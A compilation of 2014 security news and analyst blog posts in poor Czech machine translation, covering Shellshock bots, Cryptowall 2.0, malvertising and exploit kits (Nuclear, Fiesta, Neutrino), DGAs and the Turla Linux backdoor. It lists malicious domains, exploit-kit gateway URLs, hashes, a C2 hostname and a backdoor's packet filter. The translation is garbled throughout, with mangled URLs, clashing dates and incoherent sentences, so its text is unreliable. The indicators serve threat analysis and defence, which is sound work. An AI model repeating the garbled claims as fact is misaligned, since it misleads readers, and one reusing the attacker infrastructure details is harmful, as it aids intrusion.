Shellshock neustále dávat! 19.1.2014 Viry
Je to už 12 roků, protože SQL Slammer červ trápily interwebs .. když si vzpomenu na to, že byl také v lednu. Ale to nejde :). Dnes, o dvanáct let později, jsou překvapivě stále nakaženi Slammer bezpilotní letouny tam, a pokud používáte HoneyPot na UDP / 1434, slibuji, nebudete muset čekat celý tak dlouho, dokud se starověký kus historie malwaru je a- klepat.
Pravděpodobné, že Shellshock využije nebude mít stejnou výdrž, a to především proto, že útok Shellshock není soběstačný červivé v jednom paketu, ale obvykle tlačí dříve Shellshocked robotů, které skenovat do cíle. Ale to stále vypadá, jako Shellshock skenování a bot-tlačí nyní bude "šum na pozadí" v dohledné budoucnosti, protože tam je překvapující množství systémů tam, že i nadále zranitelné. Systémy, které naše senzory pak zvednout jako součást Shellbot armády. Vyšetřování jednoho z těchto botů v poslední době jsem zjistil, že to byla instalace Slackware od roku 2007 a zdálo se, že je snímač dálkového počasí, kompletní s webovou kamerou, která ukázala, že (bohužel, velmi zelená) sjezdovku níže. Podařilo se mi vypátrat majitele, hotel ve Švýcarsku, kteří byli "neví", že jejich meteorologická stanice "obsahoval počítač". Pokud naše protokoly DShield jsou nějaký náznak, existuje mnoho z těchto zařízení (a hotely, atd ..), tam venku.
Zde je to, co můžete udělat, aby pomohla. Shellshock roboty objeví nejčastěji v protokolech webového serveru, jako je například zde:
Adresa v červeném poli - 76.12.AB v tomto případě - je od místa, kde jsou skenovány. To neznamená, že původcem je zlo. S největší pravděpodobností je to jen další meteorologická stanice nebo fritéza, kde je vlastníkem "neví". Takže pokud jste je kontaktovat, je jemný, a chystal se vysvětlit hodně :)
Adresa v modrém poli - 91.142.CD v tomto případě - je od místa, kde se bot kód se vytáhl. To je nejvíce obyčejně hacknutý web server, nebo nenucený "free website hosting" účet. V tomto případě můžete najít hostingu přes "Whois", a využít jejich "Abuse" kontaktní adresy, aby věděli. Pokud zahrnete protokolu úryvek, jako je uvedeno výše, většina hosters reagovat a přijmout bot kód dolů.
Třetí věc, kterou můžete udělat, je stáhnout bot kód (opatrně :) do počítače, tím, že půjdete na http://91.142.CD/img.txt v tomto případě. Nejsem právník (takže se nemusíte mi věřit na to), ale od té doby aktivita je jasně škodlivý, a od té doby byl počítač pokyn pro skenování bot stáhnout tento kód, řekl bych, že tak činí na vlastní pěst, je v pořádku , Bot kód sám o sobě není příliš zajímavé, ale ty, které jsme dosud viděli jsou obvykle psaný v Perlu, a obsahují pevně IP adresy použité pro "Command & Control". Opět platí, že můžete určit hoster této C & C adresy přes whois, a dejte jim vědět.
Poslední dvě opatření i když opustí původní oběť infikované a zranitelný. Takže .. pokud budete mít čas a trpělivost, a vypadá to, že hostitel skenování se nachází v rezidenční nebo malý okruh obchodní adresou (myslíte, DSL), pak by to mohlo být užitečné, aby se pokusila kontaktovat původní oběť (76.12.AB nahoře) a poučit je o všech nečekaných věcí v životě, které "obsahují počítače" v těchto dnech.
Další Pozor: Je zřejmé, bot, který je skenování za přítomnosti Shellshock je s největší pravděpodobností náchylné k Shellshock samotné, a chybějící nepřeberné množství dalších náplastí. Ty by mohly být v pokušení "hrabat zpátky" na systému, a použijte Shellshock vedení na vlastní pěst zjistit, co je uvnitř. Pokud tak učiníte, i když je hacking, a nezákonné. Majitelé napadených systémů ani nevědí, jak se pirát ještě jednou o "výzkumníků", bez ohledu na to, jak údajně dobře míněné na "výzkumný pracovník" je. Pro hotelové meteorologické stanice, které uvádím výše, jsem pasivní kombinaci reverzní DNS, Google, archive.org, Netcraft a Whois zjistit, co to bylo, a na koho se obrátit.
Vnitřní Cryptowall 2,0 ransomware 7.1.2014 Virus Pokud potřebujete více důkazů, že ransomware je zde k pobytu, a může se do zbraně Počítačoví zločinci "volby, nehledejte nic jiného než Cryptowall.
Výzkumníci z Talos skupiny Cisco dnes zveřejnila analýzu o 2,0 vzorku Cryptowall, peeling zpět mnoho vrstev známých komodit kolem této hrozby, jako je jeho použití v síti Tor anonymity zamaskovat příkazové a-Control komunikaci. Ale možná ještě vyprávění o závazku kolem ransomware je investiční útočníky provedené v jeho schopnosti odhalit výkon ve virtuálních prostředích, stavební v mnoha fázích dešifrování současné době před ransomware aktivuje, a jeho schopnost detekovat 32- a 64-bitové architektury a provádění různé verze pro každého.
"Prošli hodně práce skrýt spustitelný v šifrování, zkontrolovat, zda je to běh ve virtuálním stroji a možnost využívat více prostředí," řekl Talos výzkum v oblasti bezpečnosti inženýr Earl Carter. "Tolik se do Cryptowall 2.0. Někdo šel hodně práce na přední straně, aby se zabránilo odhalení. "
Cryptowall se objevil v blízkosti před rokem a útočníci použili ji vytvořit pozoruhodné zisky . Na rozdíl od první generace ransomware, které by zamknout počítač a vytvářet falešnou zprávu informující oběť jeho stroj byl zabaven kvůli nezákonných on-line aktivit, Cryptowall a jeho bratranec Cryptolocker zvyšoval ante a šifrované soubory na napadených počítačů. Malware požaduje výkupné za dešifrovací klíč k obnovení dat uživatele, klíč, který mnohokrát není doručena, i když výkupné je rozeklaný nad.
Taková ransomware je dodáván nejčastěji přes phishing kampaní nebo odkazy na webové stránky hosting využít výstroje . U konkrétního analyzovaného vzorku Cisco, způsob infekce byla loni v létě Windows TrueType font-rozebrat zranitelnost , která umožňuje zvýšení privilegií na stroji. Kapátko byl postaven pro 32-bitové stroje, ale může také přišel s 64-bit DLL, která by mohla spustit na počítačích se systémem Windows AMD, řekl Carter.
"Tenhle se od nejlepší z obou světů; to by se začít s 32-bit využití, které by mohly využít také 64-bitové procesory AMD. Už jen to, že to bylo tak bezproblémové, že to mohlo tam a zpět mezi dvěma však potřeba byl pozoruhodný, "řekl Carter. "Normálně se to dělá jedno nebo druhé."
Zpráva Cisco do velkých detailů o fázích různých dešifrovací rutiny používaných Cryptowall 2.0, to vše ve jménu vyhnout detekci antimalware a Intrusion Detection software.
"Je to docela jednoduchá kontrola hledá společný spustitelný pro VMware nebo (Oracle) VirtualBox," řekl Carter. "Pokud se zjistí buď, že předpokládá, že je ve virtuálním pískovišti a nebude provádět. V tomto bodě, nemáte ani tu [Cryptowall] kód, jen kapátko a ne ve skutečnosti Cryptowall binární, které budou spuštěny.
"Každý má pískoviště ve virtuálním prostředí, a snaží se zabránit tomu, aby počáteční odhalení, takže to nebude vyskočí a spustit na pískovišti," řekl Carter. "Je těžké určit vzorku jako malware, a je tu šance, že bude proklouznout a zaútočit na více systémů."
News, že Cryptowall používal Tor pro velení a řízení se objevily na podzim, i když to nebylo poprvé, aby tak učinily . Malware a jiné podvody jsou stále přítomny na Tor, který skrývá původu IP adresu paketu.
"Použití Torovi jen ztěžuje identifikaci velení a řízení na zadním konci," řekl Carter. "Není to jasné, že je to příkaz-and-control provoz bude v síti. Uvidíte Tor provoz, ale můžete se dostat do základní informace, vidět rozdíl. "
Malvertising kampaně Používá AOL Ad Network, vede k Exploit Kit 7.1.2014 Viry Vědci objevili na malvertising kampaň běží na pár míst ve vlastnictví Huffington Post, který je pomocí reklamy distribuované prostřednictvím reklamní sítě AOL. Útok posílá oběti prostřednictvím řady přesměrování, které nakonec přivedlo na vstupní stránku, která je spuštěna zneužít kit.
Kampaň se objevila na prvním místě huffingtonpost.ca na 31 výzkumných pracovníků prosince a od bezpečnostní firmy Cyphort brzy zjistil, že je na hlavní stránce Huffington Post ve Spojených státech. Vědci zjistili, že kampaň pochází od reklamy se podává prostřednictvím Advertising.com sítí AOL, a jakmile uživatel klikl na škodlivém reklamu, ona byla přesměrována prostřednictvím řady chmele, některé pomocí HTTPS, dokud se trefil vstupní stránku. Že strana obsahovala zneužít kit, který sloužil jak skript využije Flash a VB.
Stránky přistání se zdají být ohroženy polské stránky.
"Je zajímavé útočníci použili kombinaci HTTP a HTTPS přesměrování skrýt servery zapojené do tohoto útoku. HTTPS Přesměrovač je umístěn na stránce Google App Engine. Tím analýzu založenou na dopravní PCAPs obtížnější, protože protokolem HTTPS je šifrována, "Cyphort analýza říká o útoku. AOL podnikla kroky k vypnutí kampaň.
"Zdá se, že tato skupina ohrožena a / nebo má přístup k více .PL domén v Polsku, a že je přesměrování přes sub-domén na těchto stránkách (nysa.pl, klodzko.pl, atd)."
Malvertising kampaň rozšířena na řadu dalších míst mimo domén Huffington Post, uvádějí vědci, a využívat kit použitý v útoku se zdá být Neutrino kit . Infekce začíná útokem Javascript a pak kód dešifruje HTML soubor a soubor VB skriptu. Soubor HTML je načten v iframe, vědci řekli, a využívá starou zranitelnost, CVE-2013-2551 use-po-bez chyby v Internet Exploreru. VB skript stáhne škodlivý spustitelný soubor.
"Cílem tohoto útoku je nainstalovat škodlivý binární - novou variantu Trojan, z rodiny Kovter. (SHA1: eec439cb201d12d7befe5482e8a36eeb52206d6f). Malware byl stažen z indus.qgettingrinchwithebooks.babia-gora.pl:8080, to byl un-šifrované binární. Po vykonání se připojí k a16-kite.pw pro CNC. Vykonává injekčním jeho užitečné zatížení do plodil svchost.exe procesu, "říkají vědci.
Výzkumníci Cyphort se dostal do kontaktu s zneužívání týmu na AOL a zaútočí zastavili brzy po.
"My vyostřila tuto otázku na bezpečnostní tým AOL ( advertising.com infekce). Jsou vyšetřuje. Nemluvili jsme na Huffington Post a desítek dalších infikovaných webových stránek, ale přesto. Krátce poté, co jsme upozorněni, AOL, útok přestal, " Nick Bilogorskiy, Cyphort výzkumník, píše se v prohlášení.
Exploit Kit Evolution Během 2014 - Jaderná balíček 28.12.2014 Viry
Toto je hostem deník předložil Brad Duncan.
Jaderná využívat sadu (také známý jako nukleární Pack) je už léta. Verze 2.0 jaderné balíček byl zaznamenán v roce 2012 [1] [2]. Blogy jako malware.dontneedcoffee.com uvedli verzi 3.0 jaderné Pack na příspěvky v 2013 [3] [4].
Tento měsíc, jaderný balíček změnil své vzory provozu. Změny jsou významné natolik, že jsem zvědavý, jestli Jaderná Pack je ve verzi 4 Nebo je to jen vývoj verze 3, jak jsme viděli v průběhu 2014? Pojďme se podívat na provoz.
V lednu 2014 provoz z jaderného balíčku bylo podobné tomu, co jsem viděl v roce 2013. Zde je příklad z 24.ledna pomocí Java infikovat VM [5]:
2014 viděl Fiesta využívat kit-stylu URL z jaderných Pack. Také, stejně jako ostatní využít sestavy, Nuclear poslal Flash a Silverlight využije. Zde je příklad Od 29. září [6]:
Výše uvedený příklad je Silverlight, Flash, PDF a IE exploity. V každém případě, náklad byl poslán na zranitelné VM. Provoz se skládá ze dvou TCP proudů. Následující obrázky ukazují jednotlivé proudy a jejich požadavky HTTP GET:
Tyto vzory jsou nedaleko od počátku roku. Viděl jsem jen další využije z jaderné Pack, která jsem předtím nevšiml.
V prosinci 2014 se jaderný balíček přesunut do jiné struktury adres URL. Poprvé jsem si toho všiml na pcap z Threatglass.com [7]. Zpočátku bych spletl provoz pro Rybář exploit kit. Po přezkoumání pcap v oblasti bezpečnosti cibulkou, uvědomil jsem si, je to Nuclear balení.
Zde je další příklad Nuclear balení od 12.12.2014 [8]:
Od změny vzorů adres URL, Nuclear Pack je XOR-ing malware užitečné zatížení. Obrázek níže ukazuje příklad, kdy jeden z užitečných zatížení je XOR-ed s ASCII řetězec: DvnQkxI
Změna dopravních modelů je poměrně významný pro jadernou Pack. Nenašel jsem žádný důvod, proč došlo ke změně. Je to jen evoluce, nebo si tyto změny ukazují na novou verzi jaderného balíčku?
----------
Brad Duncan je analytik v Rackspace Security, a on provozuje blog na malware Traffic Analysis na http://www.malware-traffic-analysis.net
Jak jsem se naučil nedělat si starosti a milovat malwaru DGAS .... 28.12.2014 Viry Růst malware rodin s využitím algoritmů pro generování domén v roce 2014, byl poněkud značný. Například, P2P GameOver Zeus, Post-Tovar Zeus a Cryptolocker všechny použité DGAS. Předpokládá se, že kód generuje domény (obvykle, ale ne vždy), tím, že data a běží to hodit nějaký magický matematiku přijít se seznamem mnoha oblastech za den. To umožňuje útočníkovi, aby se zabránilo statické seznamy domén pro zpětná volání v jejich kódu, a umožnit jim větší pružnost, aby se takedowns trochu obtížnější. Místo toho, jak se jedné domény podezřelé, nyní se musíte dostat tisíce pozastaven. A pokud si myslíte, že "dobré lidi", jsou na vás, můžete změnit šifrování semeno a získat nový seznam domén.
To znamená, že je to také dvousečný meč. Pokud se můžete dostat algoritmus, můžete proaktivně blokovat celou rodinu v jednom faul pera. Vezměte si například, hesperbot. Garage4Hackers má pěkný zápis se na tom, jak zpětně analyzovat DGA a poskytují užitečný skript na konci.
Tento konkrétní DGA negeneruje tolik domén, ale poskytuje dobrý příklad. Od samého počátku, můžete jednoduše vypsat seznam domén do RPZ či další DNS blokování technologie. To je hezké, ale co když jste chtěli udělat nějaké hrozbách Ninjitsu místo toho?
Můžete si vzít ten seznam domén, pokusí se je vyřešit a pak vypsat aktivní IP adresy a domény do krmiva. Nyní máte data, která se může otáčet pryč, hodit do CIF , nebo dát k dispozici jako OSINT dostat Šílená láska od svých vrstevníků.
V současné době lze sledovat 11 rodin tímto způsobem a procesní asi 200.000 domén, každých 10 minut, aby vytvářet kanály (můj Novoroční cílem je zvýšení této desetinásobně). To přináší zajímavý škálovatelnost problém popředí ... jak vyhledávání, že mnoho počítačů paralelně místo seriálu. V případě, že používám dva příkazy Linux: paralelní (self-vysvětlující) a ADNS-tools. ADNS-tools je sada, která umožňuje asynchronní vyhledávání DNS v mnoha hostitelů. Tak dlouho, jak budete mít přátelské DNS resolver nevadí vaše naprostou kompletní útok jeho cítění, máte dobré jít.
Tím umožňuje vzory objevovat docela rychle ... obvykle je to stejné IP adresy se podílejí, obvykle mají vyhrazenou doménu, která dělá autoritativní DNS pro všechny DGA-zovaný domén, a vy můžete posoudit, jaké národnosti jsou herci jsou tím, co svátky berou v registraci domén. :)
Vše za cenu učit trochu krajty, můžete si nastavit homebrew malware systému dohledu.
Brána do Fiesta využívat soupravy v 94.242.216.69 28.12.2014 Viry Toto je hostem deník předložil Brad Duncan.
Za poslední rok nebo tak, jsem si všiml určité skupiny pomocí bránu, který přesměruje na využití kitu (EK), obvykle Fiesta. Tato brána se vyvinul v průběhu minulého roku, změna IP adresy, názvy domén, a vzory adres URL. V současné době je tato brána je použití 94.242.216.69 jako jeho IP adresu.
Nakažený jsem VM na 2014-12-24 pomocí původní referer z příkladu jsem našel po vyhledání 94.242.216.69 webový provoz protokoly mého organizace. Obrázek níže ukazuje bránu na 94.242.216.69 a Fiesta EK na 205.234.186.111.
Nahoře: Wireshark displej pro infekci Fiesta EK pomocí této brány.
Sledování infekce provoz s bezpečnostní cibule ukazuje příslušné podpisy Snort pro Fiesta EK:
Nahoře Snort událostí z bezpečnostní cibulkou pomocí ET otevřít sadu signatur.
Podívejme se, jak se brána ukazuje na Fiesta EK. Začátkem tohoto roku, brána používá poměrně jednoduché iframe. Zde je příklad od dubna 2014:
Nahoře: Brána do Fiesta EK od dubna 2014.
Současná brána má mnohem delší javascript, a URL pro Fiesta EK je mírně popletl. Zde je příklad z 2014-12-24:
Hledat provozu na protokoly web pro 94.242.216.69, a budete pravděpodobně najít několik různých názvů domén pomocí zvláštní vzor pro brány. Zde je ukázka toho, co jsem našel na 94.242.216.69 od 12.10.2014 do 2014-12-23:
alpinias.com - GET /?_SPMq=vahK1gfvq3&z1_Aj=fW8sL8ld&nkPgy=81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf=fu5dv5&wDK9=Ydqk 1z4o6&52YRK=eHl9jdJ8j&I86__=He0S4m9G&QPy3i=J4HP58S7h&dRPS8=7bi7Y astroysch.com - GET /?LDZhT=Kegl8uezbqbx6n&_Nk98=Pa59bTd3&_Jp3B=k9hKcTeG_eS30&mwpoA=k3OmaPs700bK&E03 =6800L6Kf&_S_Z2l=z1Hge2_s2R0M0M avtrokosmo.com? - GET / eg4yxQ = 49eU6k7bIc a PB5 = ei8YapbIdQubUz3 a qMUy = w8H4iaz2 Q1sePdZ a V4Zg = 1hcfLh96u07x bendjoblac.com? - GET / L_T = XfmqeN3LeQ97Wbwa7G6U a OJgt = M1q6pbX2Xe_I8eK2n7a a Usdm_v = MerQ5S5q6R9taM0IaIyfL3 a HSLF = 5c enotikkiki.com - GET /?tBbJ=286uU9r&tikG=zaoY7Q_0KT8&F0BREM=_4S3n0w9&a2NE=9_d2Kz6&ptmh=f87qma&aOc=2UQ 5L1U1g&WEfu6e=kcn_61M1s&rqR=R2s_9S9dG&Mvn=7b kattyjerem.com? - GET / jtDO_ = 6pcoex6X_9I1TK9qJckr1Go9t3UL0sdQ_5L a ČSM = W3WO4NcvQ4M2tifG8ll9GXdxcgG0Q8Iz8Zn7M hillarysday.com? - GET / m9SO_ = y2Nbh6pd_0j9Mw8 a 4xF = 6h1WubuKajeV4Ke a bW6dQc = w6UcT2aK1f2T a mj7 = b_0u9j7Za_aV0 a vUhf = ma magggnitia.com - GET /?3W_wN=I40_W5_&eht=t8vP8M8L&2ad_uO=33KPa&_s3oi=8P5_7&QLfo=cHai8w&ZM7P_K=bSG7TH3p &UKb38=1s4wx2s&jSJyB=cM7c magicalcepp.com? - GET / SK9 = 7ufJ8Ky7H8nS34n7f1h8t887R49 a Evropského rozvojového fondu = 1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR magnitigus.com? - GET / V7k2sF = sbLLbi2fp9p073kddzfGanaT5K1cGqd a UQG = tc8Z8G0kav2v7QY5gf3I2Z8y5_V0v3dJ0P margartata.com - GET /?Cid=nak4G9z&UkE3K=3i6iq9&dUjM6_=Xe0se&J_X_g=R4taa&Jr4YHO=q9HQ34P&x1_=3gaZ4H&DVhN= v4v32&6t_=bu_1OX3O&kFP=7y_5rv7 martinegris.com - GET /?m_FxE=eh0&MkFq=H8GeS&fz7=1l3&d2T6r=ae&LeH_9=k0Il2W&Z7i6=3S1&7h_=Sdlc&zmGAU=i0uf& mMwf=ehp5p&ymV7T=y7lKe&Jpk_DF=_5_2 muertiose.com? - GET / _ I4XS = idKbueq4kR1q8 a 0TsZ = Y0Wn7Lbr6K9hch a thXvW = 56WPa qG2OdJ0 a Ff_lty = x21dbrs8y5 throneonetwo.com? - GET / rQRqX = aj2us3_9Z4 a dBzt = h4uKf3l7eV a SIDj = 5rd_7zcN0g a 2Btxc = aief3k7 a OGC = X6g62bgw9h a NUZHg = _5Q4scVc treestois.com? - GET / Zd_E = Zd_0Q9_5SZbUU32Z4m4bOchhflz2g5n1h7_b6Xgct a sIVh = M8gcrO2yw78886tz8Zf6Ycba_cRd0o1Vk1 velasvegas.com? - GET / e2_Iq = 652WNc a zup = V1Z7I2wR9m a 5_zQ = k3YT7O4H3_ a Dy 2bH = t9nsbcbm a Gm2J_ = 1Kf_Ib0 a gq_BF = 98m6 Všechny výše uvedené domény jsou registrovány na stejné organizaci:
Žadatel o registraci název / organizace: Wuxi Yilian LLC
Žadatel země: Čína
Kanceláře: www.bizcn.com
alpinias.com - Registrovaný: 2014-08-29
astroysch.com - Registrovaný: 2014-10-27
avtrokosmo.com - Registrovaný: 12.01.2014
bendjoblac.com - Registrovaný: 11.12.2014
enotikkiki.com - Registrovaný: 2014-10-21
kattyjerem.com - Registrovaný: 11.12.2014
hillarysday.com - Registrovaný: 2014-09-18
magggnitia.com - Registrovaný: 12.01.2014
magicalcepp.com - Registrovaný: 2014-09-18
magnitigus.com - Registrovaný: 12.01.2014
margartata.com - Registrovaný: 12.01.2014
martinegris.com - Registrovaný: 2014-10-21
muertiose.com - Registrovaný: 10.03.2014
throneonetwo.com - Registrovaný: 2014-10-27
treestois.com - Registrovaný: 12.01.2014
velasvegas.com - Registrovaný: 11.12.2014
Každá z domén na 94.242.216.69 je vázána na konkrétní ohrožení webové stránky. Pokud máte přístup na webový provoz a HTTP hlaviček, je snadné najít kompromisní webové stránky. Stačí se podívat na odkazové v žádosti o HTTP GET na 94.242.216.69.
Skupina, za těchto oblastech se používá alespoň 4 různých IP adres v průběhu minulého roku. To bude pravděpodobně zase změní. Wuxi Yilian LLC je žadatel o registraci pro všechny domény jsem našel pro toto přesměrování v roce 2014.
Těším se na setkání, co tato skupina dělá v roce 2015.
----------
Brad Duncan je analytik v Rackspace Security, a on provozuje blog na malware Traffic Analysis na http://www.malware-traffic-analysis.net
Červ využívající ShellShock si našel nový cíl
17.12.2014 Viry Bezpečnostní experti objevili novou verzi červa, který využívá bezpečnostní trhlinu zvanou ShellShock. Ten se nyní zaměřuje na domácí NAS servery od společnosti QNAP. Jde o datová úložiště, která se v poslední době těší velké popularitě v domácnostech i malých firmách. „Ačkoliv záplata pro zařízení QNAP, která řeší známou zranitelnost ShellShock, existuje již od října, stále je mnoho zařízení, na kterých nebyla aplikována. Důvodem je určitá obtížnost tohoto kroku z pohledu běžného uživatele,“ uvedl Pavel Bašta z Národního bezpečnostního týmu CSIRT.CZ.
Podle něj červ ve chvíli, kdy se zahnízdí v NAS serveru, spustí jednoduchý skript, který otevře do systému zadní vrátka a umožní tak stažení dalších nezvaných návštěvníků. Nad napadeným strojem tak získá zcela kontrolu.
S ohledem na hrozící nebezpečí by tak lidé neměli s instalacemi aktualizací nijak otálet. Není navíc vyloučeno, že v budoucnu se kyberzločinci zaměří na NAS servery jiných výrobců. Například letos v srpnu si vyděračský virus Cryptolocker vzal na mušku přístroje společnosti Synology.
V ohrožení bylo přes 500 miliónů počítačů Chyba přezdívaná ShellShock se vyskytuje v bashi operačního systému, tedy v softwarové komponentě, která interpretuje příkazový řádek. Trhlinu útočník může zneužít k ovládnutí prakticky jakéhokoliv počítače, který používá bash.
Podle některých bezpečnostních expertů je ShellShock horší než Chyba krvácejícího srdce (Heartbleed Bug), která byla odhalena letos na jaře. Ta se týkala šifrovací knihovny OpenSSL a zasáhla dvě třetiny celého internetu.
Podle odhadů bezpečnostních expertů je po celém světě kvůli ShellShocku potenciálně ohroženo více než 500 miliónů počítačů a webových serverů. V Česku by jich mělo být několik desítek tisíc.
Pro drtivou většinu počítačových systémů jsou k dispozici záplaty už od podzimu. Jedinci, kteří je však zatím ještě nenainstalovali, nejsou stále chráněni.
Malware podepsal s Platí SONY certifikátu (Update: To byl vtip!) 12.12.2014 Viry Aktualizace: Ukázalo se, že malware vzorek, který Kaspersky hlásil na to není aktuální malware od skutečného incidentu. Ale příběh není úplně "neškodný" a certifikátu by měly i nadále považovat za ohrožena. Výzkumník našel certifikát jako součást dat SONY, která byla široce distribuuje útočníky. Název souboru pro certifikát byl také heslo pro soukromý klíč. Výzkumník pak vytvořil podepsanou kopii existujícího vzorku malware stáhne z Malwr, a nahrál jej VirusTotal upozornit bezpečnostních agentur. Kaspersky analyzovat vzorek, a publikoval výsledky, aniž by si uvědomil, že to není "v divočině" vzorku. [1] certifikát byl přidán do příslušné seznamy CRL.
--- Originální příběh ---
My jsme opravdu tady zmínil probíhající SONY kompromis. V části, protože tam je velmi málo solidní informace veřejnosti (a nechceme jen spekulovat), a také, aniž by dobrou představu o tom, co se stalo, to je těžké mluvit o poučení.
Nicméně, jeden aspekt he útoku může mít širší důsledky. Securelist hlásí, že spatřili malware, který je podepsán platným certifikátem SONY. Je velmi pravděpodobné, že tajný klíč k vytvoření podpisu byla část kořisti z nedávné kompromisu. S malware, který je podepsaný velké korporace bude dělat to mnohem pravděpodobnější, že uživatelé k instalaci škodlivého softwaru. To také znovu zdůrazňuje hloubku, ve které SONY bylo (nebo je) ohrožena. [2]
Snahou je v plném proudu o odnětí osvědčení. Ale seznamy odvolaných certifikátů jsou notoricky nespolehlivé a pomalé aktualizovat tak to může chvíli trvat, než odvolání množit.
Malware spálené s platnou SONY certifikátem 10.12.2014 Viry My jsme opravdu tady zmínil probíhající SONY kompromis. V části, protože tam je velmi málo solidní informace veřejnosti (a nechceme jen spekulovat), a také, aniž by dobrou představu o tom, co se stalo, to je těžké mluvit o poučení.
Nicméně, jeden aspekt he útoku může mít širší důsledky. Securelist hlásí, že spatřili malware, který je podepsán platným certifikátem SONY. Je velmi pravděpodobné, že tajný klíč k vytvoření podpisu byla část kořisti z nedávné kompromisu. S malware, který je podepsaný velké korporace bude dělat to mnohem pravděpodobnější, že uživatelé k instalaci škodlivého softwaru. To také znovu zdůrazňuje hloubku, ve které SONY bylo (nebo je) ohrožena.
Snahou je v plném proudu o odnětí osvědčení. Ale seznamy odvolaných certifikátů jsou notoricky nespolehlivé a pomalé aktualizovat tak to může chvíli trvat, než odvolání množit.
The "Penquin" Turla Turla / Snake / Uroburos Malware pro Linux
9.12.2014 Viry V poslední době, zajímavý nebezpečný vzorek byl nahrán na služby multi-skeneru. To okamžitě spustí našeho zájmu, protože se zdá, že představuje dosud neznámou kus větší puzzle. Že skládačka je "Turla", jeden z nejsložitějších APTS na světě.
Psali jsme již o Turla APT s příspěvky o jejich činnosti Epic Turla a Agent.btz inspirace . Zatím každý vzorek Turla jsme se setkali byl určen pro rodiny Microsoft Windows, 32 a 64 bitové operační systémy. Nově objevený Vzorek Turla je neobvyklý v tom, že je to první Turla vzorek zaměřená na operační systém Linux , které jsme objevili.
Penquin_1
Tato nově objevená součást Turla podporuje Linux pro širší systémové podpory na oběti místech. Útok nástroj nás zavede dále do souboru vedle rootkit Snake a součástí první spojené s tímto hercem před pár lety. Domníváme se, že tato složka se ucházel o let na místě oběti, ale nemají konkrétní údaje na podporu tohoto tvrzení ještě ne.
Modul Linux Turla je C / C ++ spustitelný staticky propojeny proti více knihoven, což výrazně zvyšuje velikost souboru. To byl zbaven informací symbol, s větší pravděpodobností určena ke zvýšení analýzy úsilí, než snížit velikost souboru. Jeho funkce zahrnují skryté síťové komunikace, vzdálené spuštění libovolného příkazu a vzdálenou správu. Hodně z jeho kódu je založen na veřejných zdrojů.
Md5 Velikost Verdikt Name 0994d9deb50352e76b0322f48ee576c6 627,2kilobajt N / A (poškozený soubor) 14ecd5e6fc8e501037b54ca263896a11 637,6kilobajt HEUR: Backdoor.Linux.Turla.gen Obecná spustitelné vlastnosti:
ELF 32-bit LSB spustitelný, Intel 80386, verze 1 (SYSV), staticky propojeny, pro GNU / Linux 2.2.5, svlékl
Staticky spojené knihovny:
glibc2.3.2 - knihovna GNU C openssl v0.9.6 - starší knihovna OpenSSL Síť capture knihovna tcpdump je - Libpcap Napevno C & C, známý Turla aktivita: [.] news-bbc.podzone org doména má následující PDNS IP: 80.248.65.183
Poznámka: C & C domény je v současné době sinkholed společností Kaspersky Lab.
Popis funkce
Vzorek je stealth zadní vrátka na základě zdrojů cd00r .
Tento Turla cd00r bázi malware udržuje stealth bez nutnosti zvýšených oprávnění při spuštění libovolné dálkové příkazy. To nemůže být objeven pomocí netstat, běžně používaný nástroj pro správu. Používá techniky, které nevyžadují root přístup, který umožňuje, aby to bylo více volně pohybovat na více obětí hostitelů. I když běžný uživatel s omezenými právy to spustí, může pokračovat zachytit příchozích paketů a spustit příchozí příkazy v systému.
Uvedení do provozu a spuštění
Chcete-li zahájit plnění, proces vyžaduje dva parametry: ID (číselnou hodnotu použít jako součást "magického paketu pro ověřování") a existující název síťového rozhraní. Parametry lze zadat dvěma způsoby: ze standardního vstupu, nebo z kapátko spuštění vzorku. To není parametr příkazového řádku, je to skutečný výzvu, aby uživatel útočníka poskytnout vstupní parametry. Poté, co ID a název rozhraní jsou zadány a proces zahájen proces Backdoor v PID je vrácena. Zde je screenshot z tohoto jednoduchého rozhraní:
Penquin_2
I když neexistuje žádný počáteční síť callback, část kódu udržuje hardcoded c2 řetězec "news-bbc.podzone [.] Org". Tento plně kvalifikovaný název domény byl poprvé zřízen v roce 2010, což naznačuje, že tato binární je poměrně nedávnou v řetězci Turla kampaní. Také, když jsme se viděli další soubor ke stažení aktivitu z tohoto serveru pomocí tohoto nástroje, je pravděpodobné, že se účastnila jako souborový server svého druhu.
Magické balíčky pro vzdálené spuštění příkazového
Modul staticky spojuje pcap knihovny, a používá tento kód, aby si raw socket, aplikuje filtr na něj, a zachycuje pakety, kontrola pro specifické podmínky (* původní cd00r poprvé použil tuto metodu na základě portů a SYN paketů) , Tato podmínka je zde vyjádřena (je založena na hodnotu ID vstupu při spuštění útočníkem):
ID = 123 = filtru (tcp [8: 4] a 0xe007ffff = 0xe003bebe) nebo (udp [12: 4] a 0xe007ffff = 0xe003bebe) ID = 321 = filtru (tcp [8: 4] a 0xe007ffff = 0x1bebe) nebo (udp [12: 4] a 0xe007ffff = 0x1bebe) Jednoduše řečeno, zkontroluje číslem ACK v záhlaví TCP, nebo druhého bytu z paketu těla UDP.
Je-li takový paket a kontrola podmínkou je úspěšné, provedení skočí do paketu obsahu užitečného zatížení, a to vytváří běžné zásuvky. Backdoor zpracovává tento socket jako soubor s operací čtení / zápis. Není to typický recv / send použité v tomto kódu. Používá tuto novou zdířka pro připojení na zdrojovou adresu z "magických pakety". Pak se hlásí jeho vlastní PID a IP na vzdálenou adresu, a spustí smyčka pro příjem vzdálených příkazů. Pokud příkaz přijde, je proveden pomocí "/ bin / sh -c" scénář.
Další analýza funkčnosti vzorku bude zde aktualizovány.
Závěry
Přestože Linux variant od rámec Turla bylo známo, že existuje, jsme neviděli žádné v přírodě dosud.
Zdá se, že bylo dát dohromady z veřejných zdrojů s nějakou přidanou funkcí z útočníků Tento specifický modul. Některé z škodlivého kódu se zdá být neaktivní, snad zbytky ze starších verzí implantátu. Asi nejzajímavější částí je zde neobvyklé velení a řízení mechanismus založený na TCP / UDP pakety, stejně jako C & C hostname, která se vejde dříve známý Turla aktivitu.
Objev tohoto modulu Turla se zvýší o jednu velkou otázku: jak existuje mnoho dalších neznámých Turla varianty?
Aktualizace: Vzhledem k tomu, vydání tohoto BLOGPOST, jsme objevili další Linux Turla modul, který zřejmě představuje jiný malware generaci než dosud známých vzorků:
turla_linux_2
Nový vzorek byl zjištěné heuristickou analýzou naším výrobkem kvůli podobnosti s již dříve objevených vzorků.
Md5 Velikost Verdikt Name 19fbd8cbfb12482e8020a887d6427315 801561 bajtů HEUR: Backdoor.Linux.Turla.gen
